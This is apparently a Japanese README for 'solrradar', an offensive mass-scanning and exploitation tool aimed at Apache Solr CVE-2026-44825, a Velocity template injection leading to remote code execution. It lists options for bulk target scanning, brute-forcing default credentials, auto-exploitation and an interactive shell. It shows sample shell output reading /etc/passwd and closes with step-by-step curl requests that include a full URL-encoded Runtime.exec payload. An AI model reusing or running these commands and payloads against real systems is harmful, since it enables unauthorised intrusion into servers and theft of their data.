
☄️ Apache Solr CVE-2026-44825 向けの大規模偵察およびエクスプロイトフレームワーク — VelocityテンプレートインジェクションによるRCE
CVE-2026-44825 は Apache Solr における深刻度「Critical」の脆弱性であり、攻撃者が Velocity テンプレートインジェクションを通じて認証なしのリモートコード実行 (RCE) を達成することを可能にします。
Apache Solr の /select エンドポイントは、ユーザーが指定した Velocity テンプレートを描画する wt=velocity パラメータを受け入れます。Velocity Response Writer が有効な場合(または設定 API を介して有効化できる場合)、攻撃者は java.lang.Runtime.exec() を呼び出す悪意のあるテンプレートを注入し、Solr プロセスの権限で任意のシステムコマンドを実行できます。
| 攻撃ベクトル | 深刻度 | 影響 |
|---|---|---|
| 認証なし RCE | 9.8 (Critical) | システム全体の完全な侵害 |
| 認証済み RCE | 8.8 (High) | 認証後のコード実行 |
| 情報漏えい | 5.3 (Medium) | コア/コレクションの列挙 |
Apache Solr には、レスポンス描画用のオプションのテンプレートエンジンとして Apache Velocity がバンドルされています。この脆弱性は、ユーザーが制御するテンプレートパラメータを適切なサニタイズなしに処理する Solr の VelocityResponseWriter に存在し、Java リフレクション API の直接呼び出しを可能にします:
Java Reflection Chain:
vtl → Class.forName("java.lang.Runtime") → getRuntime().exec(cmd)
| Apache Solr バージョン | ステータス | 備考 |
|---|---|---|
| 9.4.0 – 9.10.1 | 🔴 脆弱 | 実環境で活発に悪用されている |
| 10.0.0 | 🔴 脆弱 | 最初の 10.x リリースが影響を受ける |
| 10.0.1+ | 🟢 パッチ適用済み | 修正がバックポートされた |
| 9.10.2+ | 🟢 パッチ適用済み | パッチリリースが利用可能 |
| ≤ 9.3.x | 🟢 影響なし | Velocity Response Writer が存在しない |
| 8.x (すべて) | 🟢 影響なし | Velocity をサポートしていない |
注記: バージョンチェックは、
/admin/info/systemの JSON レスポンスを解析して自動的に実行されます。
🔍 偵察
|
💀 エクスプロイト
|
# Clone the repository
git clone https://github.com/shinthink/solrradar.git
cd solrradar
# Install dependencies
pip install -r requirements.txt
# Verify
python solr_scanner.py --help
requests>=2.28.0
urllib3>=1.26.0
標準ライブラリ +
requestsのみ。特殊な依存関係はありません。
CVE-2026-44825 Apache Solr Scanner
-t, --target Single target URL or IP[:port]
-f, --file File containing targets (one per line, # for comments)
--exploit Auto-exploit if vulnerable credentials are found
--rce Launch interactive shell after authentication
-u, --user Username for Basic Auth
-pw, --password Password for Basic Auth
-o, --output JSON output file path (default: solr_results.json)
-w, --workers Number of concurrent threads (default: 30)
-T, --timeout HTTP request timeout (seconds) (default: 8)
# Single target
python solr_scanner.py -t 192.168.1.100:8983
# Single target with custom path
python solr_scanner.py -t http://example.com/solr
# Mass scan from file
python solr_scanner.py -f targets.txt -o results.json
# targets.txt — supports comments and blank lines
192.168.10.10:8983
192.168.10.20:8983
http://solr-target.internal/solr
192.168.1.0/24 # (CIDR not supported; pre-expand with external tool)
# Scan + auto-exploit if creds found
python solr_scanner.py -f targets.txt --exploit
# Known credentials + interactive shell
python solr_scanner.py -t target:8983 --rce -u admin -pw SolrRocks
# Auto brute-force + shell on success
python solr_scanner.py -t target:8983 --rce
$ python solr_scanner.py -f targets.txt
CVE-2026-44825 Apache Solr Scanner
Targets: 3 | Threads: 30 | Timeout: 8s
Scanning...
[Solr 8.11.2] http://192.168.10.10:8983/solr
[Solr 8.11.2] http://192.168.10.20:8983/solr
Cols (no auth): ['authority', 'dfa', 'oai', 'search']
[Solr 9.4.1] VULN +Auth http://solr-target.internal/solr
Done. Total:3 | Solr:3 | Vuln:1
3 つのターゲットすべてが検出されました。9.4.1 インスタンスは Basic 認証が有効で、脆弱としてフラグ付けされています。
$ python solr_scanner.py -t solr-target.internal
CVE-2026-44825 Apache Solr Scanner
[Solr 9.4.1] VULN +Auth http://solr-target.internal/solr
[!] admin:SolrRocks
Cols: ['cms', 'users', 'search', 'analytics']
デフォルト認証情報
admin:SolrRocksにより Solr 管理 API へのアクセスが許可されます。4 つのコレクションが発見されました。
$ python solr_scanner.py -t target:8983 --rce -u admin -pw SolrRocks
CVE-2026-44825 Apache Solr Scanner
[+] admin:SolrRocks
solr$ id
uid=8983(solr) gid=8983(solr) groups=8983(solr)
solr$ hostname
solr-prod-cms-01.internal
solr$ whoami
solr
solr$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
solr:x:8983:8983:Solr:/var/solr:/sbin/nologin
...
solr$ exit
Solr Java プロセスの権限を持つ完全な対話型シェルアクセスが得られます。
生の HTTP 通信を理解したい研究者向け:
ステップ 1 — Solr に到達できることを確認
curl -sk 'http://target:8983/solr/admin/info/system' | jq '.lucene."solr-spec-version"'
# "9.4.1"
ステップ 2 — 利用可能なコレクションを一覧表示
curl -sk -H 'Authorization: Basic YWRtaW46U29sclJvY2tz' \
'http://target:8983/solr/admin/collections?action=LIST'
# {"collections": ["cms", "search"]}
ステップ 3 — Velocity テンプレートインジェクションでコマンドを実行
curl -sk -H 'Authorization: Basic YWRtaW46U29sclJvY2tz' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d 'q=1&wt=velocity&v.template=custom&v.template.custom=%23set(%24x=%27%27)%23set(%24rt=%24x.class.forName(%27java.lang.Runtime%27))%23set(%24chr=%24x.class.forName(%27java.lang.Character%27))%23set(%24ex=%24rt.getRuntime().exec(%27id%27))%24ex.waitFor()%25%23set(%24out=%24ex.getInputStream())%23foreach(%24i%20in%20[1..%24out.available()])%24str.valueOf(%24chr.toChars(%24out.read()))%23end' \
'http://target:8983/solr/cms/select'